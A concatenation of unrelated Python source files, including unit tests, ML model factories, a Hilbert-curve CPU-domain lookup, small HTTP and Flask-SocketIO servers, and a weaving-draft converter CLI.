import datetime
from dayone import journal
TEST_DIR_PATH = os.path.split(os.path.abspath(__file__))[0]
JOURNAL_DAYONE_PATH = os.path.join(TEST_DIR_PATH, 'Journal.dayone')
class TestEntryObject(unittest.TestCase):
def setUp(self):
self.entry = journal.Entry(JOURNAL_DAYONE_PATH,
'31A6C3FEB30C4C07AA4784128EC30AAB.doentry')
def test_text(self):
self.assertEqual(self.entry.entry_data['Entry Text'], "Hello, World!")
def test_tags(self):
self.assertEqual(self.entry.entry_data['Tags'], ["Testing"])
def test_photo(self):
photo_path = os.path.join(JOURNAL_DAYONE_PATH,
"photos", "%s.jpg" % self.entry.uuid)
self.assertEqual(photo_path, self.entry.photo)
def test_create_journal_entry(self):
entry = journal.Entry(JOURNAL_DAYONE_PATH)
today = datetime.date.today()
text = "This is a test entry for the date of %s." % today
entry.text = text
entry.save_file()
self.assertEqual(text, entry.text)
class TestJournalObject(unittest.TestCase):
def setUp(self):
self.journal = journal.Journal(JOURNAL_DAYONE_PATH)
def test_get_entries(self):
self.journal.get_entries()
entries = self.journal.entries
self.assertTrue(entries)
def test_filter_by_date(self):
entries = self.journal.filter_by_date(datetime.date.today())
self.assertTrue(entries)
def test_filter_between_dates(self):
TODAY = datetime.date.today()
SEVEN_DAYS_AGO = TODAY - datetime.timedelta(days=7)
entries = self.journal.filter_between_dates(SEVEN_DAYS_AGO, TODAY)
self.assertTrue(entries)
if __name__ == '__main__':
unittest.main()
|
11482880
|
import os
import torch
from models.bert_for_multi_label import (BertFCForMultiLable,
BertCNNForMultiLabel,
BertRCNNForMultiLabel,
BertDPCNNForMultiLabel)
from models.textcnn import TextCNN
from models.textrcnn import TextRCNN
from scheme.error import ModelNotDefinedError
from configs.basic_config import config
class Classifier:
def __init__(self, choose_model: str,
choose_pretrain: str,
resume_path: str):
self.choose_model = choose_model
self.choose_pretrain = choose_pretrain
self.resume_path = resume_path
def __call__(self, num_labels: int):
if self.choose_pretrain == "Bert":
if self.resume_path:
model_dir = self.resume_path
else:
model_dir = config.bert_model_dir
if self.choose_model == "BertFC":
model = BertFCForMultiLable.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertCNN":
model = BertCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertRCNN":
model = BertRCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertDPCNN":
model = BertDPCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
else:
raise ModelNotDefinedError
elif self.choose_pretrain in ["Word2vec", "Nopretrain"]:
if self.resume_path:
model_dir = self.resume_path
else:
model_dir = None
if self.choose_pretrain == "Word2vec":
pretrain_model_dir = config.word2vec_model_dir
else:
pretrain_model_dir = None
if self.choose_model == "TextCNN":
cnn_config = config.cnn
cnn_config.embedding_pretrained = pretrain_model_dir
cnn_config.embedding_size = config.embedding_size
cnn_config.vocab_size = config.vocab_size
cnn_config.dropout = config.dropout
cnn_config.num_labels = num_labels
if self.resume_path:
model = TextCNN(cnn_config)
state_dict_file = os.path.join(
model_dir, "pytorch_model.bin")
model.load_state_dict(torch.load(state_dict_file))
else:
model = TextCNN(cnn_config)
elif self.choose_model == "TextRCNN":
rcnn_config = config.rcnn
rcnn_config.num_labels = num_labels
if self.resume_path:
model = TextRCNN(rcnn_config)
else:
model = TextRCNN(rcnn_config)
model.load_state_dict(torch.load(model_dir))
else:
raise ModelNotDefinedError
else:
raise ModelNotDefinedError
return model
|
11482897
|
import os
from functools import wraps
if os.getenv('SHARED_MEMORY_USE_LOCK') == '1':
from multiprocessing import Lock
else:
class Lock: # type: ignore
def acquire(self):
pass
def release(self):
pass
_lock = Lock()
def lock(func):
@wraps(func)
def wrapper(*args, **kwargs):
_lock.acquire()
try:
return func(*args, **kwargs)
finally:
_lock.release()
return wrapper
|
11482915
|
import sys
import unittest
import io
from resync.resource import Resource
from resync.resource_list import ResourceList
from resync.capability_list import CapabilityList
from resync.sitemap import Sitemap, SitemapIndexError, SitemapParseError
import subprocess
def run_resync(args):
args.insert(0, './resync-build')
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
return(out)
class TestClientLinkOptions(unittest.TestCase):
def test01_no_links(self):
xml = run_resync(['--write-resourcelist',
'http://example.org/t', 'tests/testdata/dir1'])
rl = ResourceList()
rl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(rl), 2)
self.assertEqual(rl.link('describedby'), None)
def test02_resource_list_links(self):
xml = run_resync(['--write-resourcelist',
'--describedby-link=a',
'--sourcedescription-link=b', # will be ignored
'--capabilitylist-link=c',
'http://example.org/t', 'tests/testdata/dir1'])
rl = ResourceList()
rl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(rl), 2)
self.assertNotEqual(rl.link('describedby'), None)
self.assertEqual(rl.link('describedby')['href'], 'a')
self.assertNotEqual(rl.link('up'), None)
self.assertEqual(rl.link('up')['href'], 'c')
def test03_capability_list_links(self):
xml = run_resync(['--write-capabilitylist=resourcelist=rl,changedump=cd',
'--describedby-link=a',
'--sourcedescription-link=b',
'--capabilitylist-link=c']) # will be ignored
capl = CapabilityList()
capl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(capl), 2)
self.assertNotEqual(capl.link('describedby'), None)
self.assertEqual(capl.link('describedby')['href'], 'a')
self.assertNotEqual(capl.link('up'), None)
self.assertEqual(capl.link('up')['href'], 'b')
|
11482942
|
import appdaemon.plugins.hass.hassapi as hass
#
# App to respond to buttons on an Aeotec Minimote
#
# Args:
#
# Minimote can send up to 8 scenes. Odd numbered scenes are short presses of the buttons, even are long presses
#
# Args:
#
#scene_<id>_on - name of the entity to turn on when scene <id> is activated
#scene_<id>_off - name of the entity to turn off when scene <id> is activated. If the entity is a scene it will be turned on.
#scene_<id>_toggle - name of the entity to toggle when scene <id> is activated
#
# Each scene can have up to one of each type of action, or no actions - e.g. you can turn on one light and turn off another light for a particular scene if desired
#
class MiniMote(hass.Hass):
def initialize(self):
self.listen_event(self.zwave_event, "zwave_js_value_notification", node_id = self.args["node_id"])
def zwave_event(self, event_name, data, kwargs):
#self.log("Event: {}, data = {}, args = {}".format(event_name, data, kwargs))
scene = data["value"]
on = "scene_{}_on".format(scene)
off = "scene_{}_off".format(scene)
toggle = "scene_{}_toggle".format(scene)
panic_mode = "off"
if "panic_mode_boolean" in self.args:
panic_mode = self.get_state(self.args["panic_mode_boolean"])
panic_entity = self.args["panic_entity"]
if panic_mode == "on":
self.log("Panic Mode! Turning {} on".format(panic_entity))
self.turn_on(panic_entity)
elif on in self.args:
self.log("Turning {} on".format(self.args[on]))
self.turn_on(self.args[on])
elif off in self.args:
type, id = self.args[off].split(".")
if type == "scene":
self.log("Turning {} on".format(self.args[off]))
self.turn_on(self.args[off])
else:
self.log("Turning {} off".format(self.args[off]))
self.turn_off(self.args[off])
elif toggle in self.args:
self.log("Toggling {}".format(self.args[toggle]))
self.toggle(self.args[toggle])
|
11483065
|
from django.conf.urls import include, url
from rest_framework import routers
from audit.views import AuditLogViewSet
router = routers.DefaultRouter()
router.register(r"", AuditLogViewSet, basename="audit")
urlpatterns = [url(r"^", include(router.urls))]
|
11483106
|
from dataclasses import dataclass
from dataclasses import field
from datetime import date
from typing import NewType
CategoryId = NewType("CategoryId", int)
@dataclass
class Category:
primary_key: CategoryId
name: str
cost: int
class Token:
def is_expired(self):
return True
PriceId = NewType("PriceId", int)
@dataclass
class Price:
primary_key: PriceId
cost: int
period: int
ProfileId = NewType("ProfileId", int)
@dataclass
class Profile:
primary_key: ProfileId
balance: int
def has_enough_balance(self, price):
return self.balance >= price.cost
SubscriptionId = NewType("SubscriptionId", int)
@dataclass
class Subscription:
primary_key: SubscriptionId
created: date = field(default=date(2019, 1, 1), repr=False)
def is_expired(self):
expiration = {1: False, 7: True}
return expiration[self.primary_key]
|
11483141
|
from lxml import etree
from StringIO import StringIO
from collections import deque
import log
logger = log.getlogger("rendertree", log.DEBUG)
class RenderTree(object):
def __init__(self, roots=[]):
self.roots = roots
class RenderTreeNode(object):
def __init__(self, info="", xml=None, children=[], parent=None):
self.info = info
self.xml = xml
self.children = children
self.parent = parent
def __str__(self):
return "info={}, xml={}".format(self.info, str(self.xml))
def parse_xmltree(xml):
try:
t = etree.parse(StringIO(xml))
except Exception as e:
logger.exception(e)
logger.info("XML Parser failed parsing. Reparsing with recover=True")
parser = etree.XMLParser(recover=True)
t = etree.parse(StringIO(xml), parser)
return t
def merge_into_xhtmltree(main_page, iframes_content):
t = parse_xmltree(main_page)
for k, v in iframes_content.iteritems():
if "/head" in k:
continue
el = t.xpath(k, namespaces={'xhtml':'http://www.w3.org/1999/xhtml'})
if len(el) != 1: # if that happens, no match or xpath is non ambiguous
logger.warning("{} iframes were found with {}".format(len(el), k))
if len(el) > 0:
subt_root = el[0]
subt = parse_xmltree(v)
subt_root.insert(0, subt.getroot())
else:
logger.warning("No iframes found.")
return t
def _recurs_tree_creation(xml_n, rend_parent_n):
rend_n = RenderTreeNode()
rend_n.parent = rend_parent_n
rend_n.xml = xml_n
if isinstance(xml_n, etree._Comment):
rend_n.info = "comment"
else:
rend_n.info = xml_n.tag
rend_n.children = []
for xml_c in xml_n.getchildren():
rend_n.children.append(_recurs_tree_creation(xml_c, rend_n))
return rend_n
def build_rendertree(xhtml):
rend_tree = RenderTree()
xml_root = xhtml.getroot()
rend_root = _recurs_tree_creation(xml_root, rend_tree)
rend_tree.roots = [rend_root]
return rend_tree
_IGNORE_TAGS = ["html", "head", "script", "meta", "link", "base", "style", "title"]
def _remove_namespace(tag):
NSes = ["{http://www.w3.org/1999/xhtml}", "{http://www.w3.org/2000/svg}"]
for ns in NSes:
if ns in tag:
return tag[len(ns):]
return tag
def remove_invisible_nodes(rend_tree):
"""
We visit the render tree to delete all XML elements that
are not visible. If the node has children, they are inserted in
"""
Q = deque(rend_tree.roots) # initialize the queue with the roots (usually only one root)
cnt = 0
while len(Q) > 0:
#print "QUEUE: ", ",".join([_remove_namespace(el.info) for el in Q])
n = Q.popleft()
if _remove_namespace(n.info) in _IGNORE_TAGS or n.info == "comment":
#print " !!!!! DELETE !!!!! ", _remove_namespace(n.info)
"""
- we visit n's children and update parent
"""
for c in n.children:
c.parent = n.parent
"""
- then we visit n.parent and:
1) delete n from children, and
2) insert at the position of n
all the children of n
"""
if isinstance(n.parent, RenderTree): # n is a root
child_pos = n.parent.roots.index(n)
n.parent.roots = n.parent.roots[0:child_pos] + n.children + n.parent.roots[child_pos+1:]
else: # n is an inner node
child_pos = n.parent.children.index(n)
n.parent.children = n.parent.children[0:child_pos] + n.children + n.parent.children[child_pos+1:]
cnt += 1
Q.extend(n.children)
print "Deleted {} nodes".format(cnt)
return rend_tree
def save_xml_to_file(xml, file):
import codecs
with codecs.open(file, "w", encoding="utf-8") as f:
f.write(etree.tostring(xml, pretty_print=True))
def load_xml_from_file(file):
t = None
with open(file, "r") as f:
t = etree.parse(f)
return t
|
11483147
|
from brightics.common.exception import BrighticsFunctionException
def get_required_parameters(func):
import inspect
def _check_required(param):
return param.default is inspect.Parameter.empty and (param.kind is not inspect.Parameter.VAR_POSITIONAL and param.kind is not inspect.Parameter.VAR_KEYWORD)
signature = inspect.signature(func)
return [p.name for p in signature.parameters.values() if _check_required(p)]
def is_empty(value):
if isinstance(value, list) or isinstance(value, str):
return not value
return False
def check_required_parameters(func, params, excluded_param_keys=None):
if excluded_param_keys is None:
excluded_param_keys = []
required_params = get_required_parameters(func)
params_to_check = [param for param in required_params if param not in excluded_param_keys]
for rp in params_to_check:
if (rp not in params) or is_empty(params[rp]):
raise BrighticsFunctionException.from_errors([{'0033': [rp]}])
|
11483177
|
from pathlib import Path
from addok.config import config
from addok.db import DB
@config.on_load
def load_scripts():
root = Path(__file__).parent / 'lua'
for path in root.glob('*.lua'):
with path.open() as f:
name = path.name[:-4]
globals()[name] = DB.register_script(f.read())
|
11483183
|
import socket
import ftplib
from ftplib import FTP
import sys
#if __name__ == "__main__":
# login = str(sys.argv[1])
# passwd = str(sys.argv[2])
# print(login,passwd)
#ftp = FTP('ftp.debian.org') # connect to host, default port
#ftp.login()
#print(ftp)
ip='ftp://ftp.sltac.cls.fr/Core/SEALEVEL_GLO_PHY_L4_REP_OBSERVATIONS_008_047/dataset-duacs-rep-global-merged-allsat-phy-l4-v3'
#port=990
ftp = FTP(ip)
ftp.login(login,passwd)
|
11483200
|
import numpy as np
def hilbert3d(X, bit_length):
"""Compute the order using Hilbert indexing.
Arguments
---------
X : (N, ndim) float array
The positions
bit_length : integer
The bit_length for the indexing.
"""
X = np.atleast_2d(X)
state_diagram = (
np.array(
[
1,
2,
3,
2,
4,
5,
3,
5,
0,
1,
3,
2,
7,
6,
4,
5,
2,
6,
0,
7,
8,
8,
0,
7,
0,
7,
1,
6,
3,
4,
2,
5,
0,
9,
10,
9,
1,
1,
11,
11,
0,
3,
7,
4,
1,
2,
6,
5,
6,
0,
6,
11,
9,
0,
9,
8,
2,
3,
1,
0,
5,
4,
6,
7,
11,
11,
0,
7,
5,
9,
0,
7,
4,
3,
5,
2,
7,
0,
6,
1,
4,
4,
8,
8,
0,
6,
10,
6,
6,
5,
1,
2,
7,
4,
0,
3,
5,
7,
5,
3,
1,
1,
11,
11,
4,
7,
3,
0,
5,
6,
2,
1,
6,
1,
6,
10,
9,
4,
9,
10,
6,
7,
5,
4,
1,
0,
2,
3,
10,
3,
1,
1,
10,
3,
5,
9,
2,
5,
3,
4,
1,
6,
0,
7,
4,
4,
8,
8,
2,
7,
2,
3,
2,
1,
5,
6,
3,
0,
4,
7,
7,
2,
11,
2,
7,
5,
8,
5,
4,
5,
7,
6,
3,
2,
0,
1,
10,
3,
2,
6,
10,
3,
4,
4,
6,
1,
7,
0,
5,
2,
4,
3,
]
)
.reshape(12, 2, 8)
.T
)
x_bit_mask, y_bit_mask, z_bit_mask = (
np.zeros(bit_length, dtype=bool) for _ in range(3)
)
i_bit_mask = np.zeros(3 * bit_length, dtype=bool)
npoint = X.shape[0]
order = np.zeros(npoint)
# Convert positions to binary
for ip in range(npoint):
for i in range(bit_length):
mask = 0b01 << i
x_bit_mask[i] = X[ip, 0] & mask
y_bit_mask[i] = X[ip, 1] & mask
z_bit_mask[i] = X[ip, 2] & mask
for i in range(bit_length):
# Interleave bits
i_bit_mask[3 * i + 2] = x_bit_mask[i]
i_bit_mask[3 * i + 1] = y_bit_mask[i]
i_bit_mask[3 * i] = z_bit_mask[i]
# Build Hilbert ordering using state diagram
cstate = 0
for i in range(bit_length - 1, -1, -1):
sdigit = (
4 * i_bit_mask[3 * i + 2]
+ 2 * i_bit_mask[3 * i + 1]
+ 1 * i_bit_mask[3 * i]
)
nstate = state_diagram[sdigit, 0, cstate]
hdigit = state_diagram[sdigit, 1, cstate]
i_bit_mask[3 * i + 2] = hdigit & 0b100
i_bit_mask[3 * i + 1] = hdigit & 0b010
i_bit_mask[3 * i] = hdigit & 0b001
cstate = nstate
# Compute ordering
for i in range(3 * bit_length):
order[ip] = order[ip] + i_bit_mask[i] * 2 ** i
return order
def get_cpu_list(ds, X):
"""
Return the list of the CPU intersecting with the positions
given. Note that it will be 0-indexed.
Parameters
----------
ds : Dataset
The dataset containing the information
X : (N, ndim) float array
An array containing positions. They should be between 0 and 1.
"""
X = np.atleast_2d(X)
if X.shape[1] != 3:
raise NotImplementedError("This function is only implemented in 3D.")
levelmax = ds.parameters["levelmax"]
ncpu = ds.parameters["ncpu"]
ndim = ds.parameters["ndim"]
xmin, ymin, zmin = X.min(axis=0)
xmax, ymax, zmax = X.max(axis=0)
dmax = max(xmax - xmin, ymax - ymin, zmax - zmin)
ilevel = 0
deltax = dmax * 2
while deltax >= dmax:
ilevel += 1
deltax = 0.5 ** ilevel
lmin = ilevel
bit_length = lmin - 1
maxdom = 2 ** bit_length
imin, imax, jmin, jmax, kmin, kmax = 0, 0, 0, 0, 0, 0
if bit_length > 0:
imin = int(xmin * maxdom)
imax = imin + 1
jmin = int(ymin * maxdom)
jmax = jmin + 1
kmin = int(zmin * maxdom)
kmax = kmin + 1
dkey = (2 ** (levelmax + 1) / maxdom) ** ndim
ndom = 1
if bit_length > 0:
ndom = 8
idom, jdom, kdom = (np.zeros(8, dtype="int64") for _ in range(3))
idom[0], idom[1] = imin, imax
idom[2], idom[3] = imin, imax
idom[4], idom[5] = imin, imax
idom[6], idom[7] = imin, imax
jdom[0], jdom[1] = jmin, jmin
jdom[2], jdom[3] = jmax, jmax
jdom[4], jdom[5] = jmin, jmin
jdom[6], jdom[7] = jmax, jmax
kdom[0], kdom[1] = kmin, kmin
kdom[2], kdom[3] = kmin, kmin
kdom[4], kdom[5] = kmax, kmax
kdom[6], kdom[7] = kmax, kmax
bounding_min, bounding_max = np.zeros(ndom), np.zeros(ndom)
for i in range(ndom):
if bit_length > 0:
order_min = hilbert3d([idom[i], jdom[i], kdom[i]], bit_length)
else:
order_min = 0
bounding_min[i] = (order_min) * dkey
bounding_max[i] = (order_min + 1) * dkey
bound_key = {}
for icpu in range(1, ncpu + 1):
bound_key[icpu - 1], bound_key[icpu] = ds.hilbert_indices[icpu]
cpu_min, cpu_max = (np.zeros(ncpu + 1, dtype="int64") for _ in range(2))
for icpu in range(1, ncpu + 1):
for i in range(ndom):
if (
bound_key[icpu - 1] <= bounding_min[i]
and bound_key[icpu] > bounding_min[i]
):
cpu_min[i] = icpu - 1
if (
bound_key[icpu - 1] < bounding_max[i]
and bound_key[icpu] >= bounding_max[i]
):
cpu_max[i] = icpu
ncpu_read = 0
cpu_list = []
cpu_read = np.zeros(ncpu, dtype="bool")
for i in range(ndom):
for j in range(cpu_min[i], cpu_max[i]):
if not cpu_read[j]:
ncpu_read += 1
cpu_list.append(j)
cpu_read[j] = True
return sorted(cpu_list)
|
11483210
|
import sys
import json
import pandas as pd
import numpy as np
import pickle
from http.server import BaseHTTPRequestHandler, HTTPServer
MODEL = None
MODEL_FILENAME = "model.pickle"
def create_and_persist_model():
global MODEL
from keras.datasets import fashion_mnist
(x, y), _ = fashion_mnist.load_data()
classes = ['tshirt', 'trouser', 'pullover', 'dress', 'coat', 'sandal', 'shirt', 'shoe', 'bag', 'boot']
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x[:1000].reshape(-1, 28 * 28), y[:1000].flatten(), test_size=0.25, random_state=0)
# Prepare examples
y_train_1 = y_train == 1
y_test_1 = y_test == 1
from sklearn.linear_model import LogisticRegression
MODEL = LogisticRegression(solver='liblinear').fit(x_train, y_train_1)
pickle.dump(MODEL, open(MODEL_FILENAME, "wb" ))
def restore_model():
global MODEL
MODEL = pickle.load( open( "model.pickle", "rb" ) )
class ML_RequestHandler(BaseHTTPRequestHandler):
def predict(self, image):
prediction = MODEL.predict(np.asarray([image]).astype('u8'))
return bool(prediction[0])
def do_POST(self):
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
image = json.loads(post_body)
prediction = json.dumps({"is_trousers": self.predict(image)})
print(prediction)
# Send response status code
self.send_response(200)
# Send headers
self.send_header('Content-type','application/json')
self.end_headers()
# Send message back to client
# Write content as utf-8 data
self.wfile.write(bytes(prediction, "utf8"))
return
def run_server():
print('starting server...')
server_address = ('127.0.0.1', 8001)
httpd = HTTPServer(server_address, ML_RequestHandler)
print('running server...')
httpd.serve_forever()
try:
restore_model() # The first time that this script is run, the model will be created and cached. Thereafter it is reused.
except:
create_and_persist_model()
if __name__ == '__main__':
run_server()
|
11483226
|
import os, sys, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import storage
def read(fn):
d = dict()
lines = storage.read_file(fn, True)
for line in lines:
edgeid = int(line.split("=")[0])
d[edgeid] = line[:-1].split("=")[1].split(",")
return d
|
11483233
|
import tensorflow as tf
import random
import numpy as np
from .registry import register
def generate_batch(params):
features = []
labels = []
sequence_lengths = []
target_mask = []
# helper to mask total_list
total_mask = [-1] * (params.num_digits + 1)
for _ in range(params.batch_size):
feature = []
label = []
total = 0
mask = []
sequence_length = random.randint(1, params.max_difficulty)
sequence_lengths.append(sequence_length)
# generate one number
for i in range(sequence_length):
num_digits = random.randint(1, params.num_digits)
value = []
for _ in range(num_digits):
value.append(random.randint(0, 9))
# remove zero if value start with zero
while value and value[0] == 0:
value.pop(0)
# add to total if value is not zero
if value:
total += int(''.join(map(str, value)))
# convert int to list of int
total_list = list(map(int, str(total)))
# pad value with -1
value += [-1] * (params.num_digits - len(value))
# pad digits beyond the end of target number with 11
total_list += [-1] * (params.num_digits + 1 - len(total_list))
# mask number of digits
mask.append((1 - np.equal(total_list, total_mask).astype(int)).tolist())
feature.append(value)
label.append(total_list)
# pad samples, targets to sequence length
sequence_offset = params.max_difficulty - sequence_length
feature += [[-1] * params.num_digits] * sequence_offset
label += [[-1] * (params.num_digits + 1)] * sequence_offset
mask += [[0] * (params.num_digits + 1)] * sequence_offset
assert len(feature) == len(label) == len(mask)
features.append(feature)
labels.append(label)
target_mask.append(mask)
return features, sequence_lengths, target_mask, labels
@register("addition")
def input_fn(data_sources, params, training):
def _input_fn():
""" Generate batch_size number of addition samples
pad x with -1 and y with 11 to match sequence length and number of digits
y has 11 classes, the 11th class represent number is complete
Returns:
x: shape=(batch_size, max_difficulty, num_digits * 10),
randomly generated integer
seq_length: shape(batch_size,). sequence length for each input
y: shape=(batch_size, max_difficulty, num_digits + 1 * 11),
sum of x until the current index
"""
get_batch = lambda: generate_batch(params)
x, seq_length, target_mask, y = \
tf.py_func(get_batch, [], [tf.int64, tf.int64, tf.int64, tf.int64])
x = tf.reshape(
tf.one_hot(x, depth=10),
shape=(params.batch_size, params.max_difficulty,
params.num_digits * 10))
y = tf.reshape(
tf.one_hot(y, depth=10),
shape=(params.batch_size, params.max_difficulty, params.num_classes))
seq_length.set_shape(shape=(params.batch_size,))
target_mask.set_shape(
shape=(params.batch_size, params.max_difficulty, params.num_digits + 1))
return {
"inputs": x,
"seq_length": seq_length,
"difficulty": seq_length,
"target_mask": target_mask
}, y
return _input_fn
|
11483265
|
import matplotlib.pyplot as plt
import panel as pn
import seaborn as sns
penguins = sns.load_dataset("penguins")
from dataviz_in_python import config
config.configure(url="lib_seaborn", title="Seaborn")
TEXT = """
# Seaborn: Statistical data visualization
[Seaborn](https://seaborn.pydata.org/) Seaborn is a Python data visualization
library based on [matplotlib](lib_matplotlib). It provides a high-level
interface for drawing attractive and informative statistical graphics.
Please note the lead developer is tweeting about upcoming, major changes to
the api.
[Source Code](https://github.com/MarcSkovMadsen/dataviz-in-python/blob/main/src/dataviz_in_python/presentation/lib_seaborn.py)
"""
pn.panel(TEXT, css_classes=[config.TEXT_CLASS]).servable()
def get_plot(theme="default", accent_base_color="blue"):
if theme == "dark":
sns.set_style("darkgrid")
plt.style.use("dark_background")
else:
plt.style.use("default")
sns.set_style("whitegrid")
plot = sns.displot(penguins, x="flipper_length_mm", color=accent_base_color)
fig0 = plot.fig
fig0.set_size_inches(16, 8)
return fig0
plot = get_plot(theme=config.get_theme(), accent_base_color=config.ACCENT_BASE_COLOR)
pn.pane.Matplotlib(plot, height=700, sizing_mode="stretch_both").servable()
|
11483303
|
from flask import Flask, jsonify, render_template
from subprocess import call
from flask_socketio import SocketIO, send, emit
app = Flask(__name__)
app.secret_key = 'mysecret'
socket_io = SocketIO(app)
# _mode = 'start' or 'stop'
_mode = 'stop'
@app.route('/')
def draw():
return render_template('main.html')
# Changing Mode
@socket_io.on('change mode')
def changer(data):
global _mode
if data['mode'] == 'start':
_mode = 'start'
else:
_mode = 'stop'
# Receiving Messages
@socket_io.on('my event')
def drawer(data):
global _mode
if _mode == 'stop':
pass
else:
print('input data: ' + str(data))
# send to webpage
emit('draw', data, broadcast=True)
if __name__ == '__main__':
socket_io.run(app, debug=True, host='localhost', port=8000)
#socket_io.run(app, debug=True, host='0.0.0.0', port=80)
|
11483351
|
from tests.fixtures.envs.wrappers.reshape_observation import ReshapeObservation
__all__ = ['ReshapeObservation']
|
11483467
|
import numpy as np
import h5py
import argparse
description="""
Merge partial LUT simulations into a single, complete
LUT with no NaN's.
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=description)
parser.add_argument("h5_out", help="Output file")
parser.add_argument("h5_in", nargs="+", help="Input files")
args = parser.parse_args()
# read all partial simulations
beam_profiles = []
for h5_in in args.h5_in:
print "Processing %s..." % h5_in
with h5py.File(h5_in, "r") as f:
beam_profiles.append(f["beam_profile"].value)
ele_extent = f["ele_extent"].value
lat_extent = f["lat_extent"].value
rad_extent = f["rad_extent"].value
beam_profile = sum(beam_profiles)
min_value = np.min(beam_profile.flatten())
max_value = np.max(beam_profile.flatten())
beam_profile = (beam_profile-min_value)/(max_value-min_value)
with h5py.File(args.h5_out, "w") as f:
f["beam_profile"] = beam_profile
f["ele_extent"] = ele_extent
f["lat_extent"] = lat_extent
f["rad_extent"] = rad_extent
|
11483484
|
import unittest
import requests
from biolinkml.generators.yumlgen import YumlGenerator
from tests.utils.test_environment import TestEnvironmentTestCase
from tests.test_issues.environment import env
class EmptyClassTestCase(TestEnvironmentTestCase):
env = env
def test_prefix(self):
env.generate_single_file('issue112.yuml', lambda: YumlGenerator(env.input_path('issue_112.yaml')).serialize(),
value_is_returned=True)
with open(env.expected_path('issue112.yuml')) as f:
url = f.read()
resp = requests.get(url)
self.assertTrue(resp.ok)
if __name__ == '__main__':
unittest.main()
|
11483491
|
import string
from ml4ir.applications.ranking.tests.test_base import RankingTestBase
from ml4ir.base.features import preprocessing
import tensorflow as tf
import numpy as np
class RankingModelTest(RankingTestBase):
def test_text_preprocesing(self):
"""
Asserts the preprocessing of a string tensor by
converting it to its lower case form and removing punctuations
"""
input_text = "ABCabc123!@#"
processed_text = (
preprocessing.preprocess_text(input_text, remove_punctuation=True, to_lower=True)
.numpy()
.decode("utf-8")
)
# Converting to lower case
assert processed_text.lower() == processed_text
# Removing punctuation
assert (
processed_text.translate(str.maketrans("", "", string.punctuation)) == processed_text
)
# Overall
assert processed_text.replace("\x00", "") == input_text.lower().translate(
str.maketrans("", "", string.punctuation)
)
assert processed_text.replace("\x00", "") == "abcabc123"
def test_text_preprocesing_with_replace_by_whitespace(self):
"""
Asserts the preprocessing of a string tensor with custom punctuation character and whitespace replacement character
"""
input_text = " # abc. bcd-$#efg@hij ."
processed_text = (
preprocessing.preprocess_text(input_text,
remove_punctuation=True,
to_lower=True,
punctuation=".-$#",
replace_with_whitespace=True)
.numpy()
.decode("utf-8")
)
self.assertEqual("abc bcd efg@hij", processed_text)
def test_get_one_hot_vectorizer(self):
"""
Asserts ml4ir.base.features.preprocessing.get_one_hot_vectorizer
"""
feature_info = {
"name": "categorical_variable",
"feature_layer_info": {
"fn": "categorical_indicator_with_vocabulary_file",
"args": {
"vocabulary_file": "ml4ir/applications/classification/tests/data/configs/vocabulary/entity_id.csv",
"num_oov_buckets": 1,
},
},
"default_value": "",
}
one_hot_vectorizer = preprocessing.get_one_hot_label_vectorizer(feature_info, self.file_io)
# Assert 1st position
one_hot_labels = one_hot_vectorizer(tf.constant(["AAA"]))
expected_one_hot_labels = tf.constant([[1.] + 8*[0.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
# Assert 7th position
one_hot_labels = one_hot_vectorizer(tf.constant(["GGG"]))
expected_one_hot_labels = tf.constant([6*[0.] + [1.] + 2*[0.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
# Assert last position for out of vocabulary
one_hot_labels = one_hot_vectorizer(tf.constant(["out of vocabulary"]))
expected_one_hot_labels = tf.constant([8*[0.] + [1.]])
assert tf.reduce_all(tf.equal(one_hot_labels, expected_one_hot_labels))
def test_split_and_pad_string(self):
"""
Asserts ml4ir.base.features.preprocessing.split_and_pad_string
"""
input_text = tf.constant(["_A_BC_ab_c1_23!@_#"])
split_text = preprocessing.split_and_pad_string(input_text, split_char="_", max_length=25)
expected_split_text = tf.constant(["", "A", "BC", "ab", "c1", "23!@", "#"] + [""]*18)
assert tf.reduce_all(tf.equal(split_text, expected_split_text))
def testing_click_conversion(self):
typ = 'int'
label_vector = np.ones(10, dtype=typ)
label_vector = tf.convert_to_tensor(label_vector)
clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
comp = tf.equal(label_vector, clicks)
assert sum(tf.dtypes.cast(comp, 'int8')) == 10
typ = 'float'
label_vector = np.ones(10, dtype=typ)
label_vector[0] = 5
label_vector[-1] = 5
label_vector = tf.convert_to_tensor(label_vector)
clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
assert clicks[0] == 1 and clicks[-1] == 1 and sum(clicks[1:-1]) == 0
typ = 'int'
label_vector = np.zeros(10, dtype=typ)
label_vector = tf.convert_to_tensor(label_vector)
clicks = preprocessing.convert_label_to_clicks(label_vector, typ)
assert sum(tf.dtypes.cast(comp, 'int8')) == 10
|
11483504
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import argparse
from . import Draft, instructions
from .wif import WIFReader, WIFWriter
from .render import ImageRenderer, SVGRenderer
def load_draft(infile):
if infile.endswith('.wif'):
return WIFReader(infile).read()
elif infile.endswith('.json'):
with open(infile) as f:
return Draft.from_json(f.read())
else:
raise ValueError(
"filename %r unrecognized: .wif and .json are supported" %
infile)
def render(opts):
draft = load_draft(opts.infile)
if opts.outfile:
if opts.outfile.endswith('.svg'):
SVGRenderer(draft).save(opts.outfile)
else:
ImageRenderer(draft).save(opts.outfile)
else:
ImageRenderer(draft).show()
def convert(opts):
draft = load_draft(opts.infile)
if opts.outfile.endswith('.wif'):
WIFWriter(draft).write(opts.outfile)
elif opts.outfile.endswith('.json'):
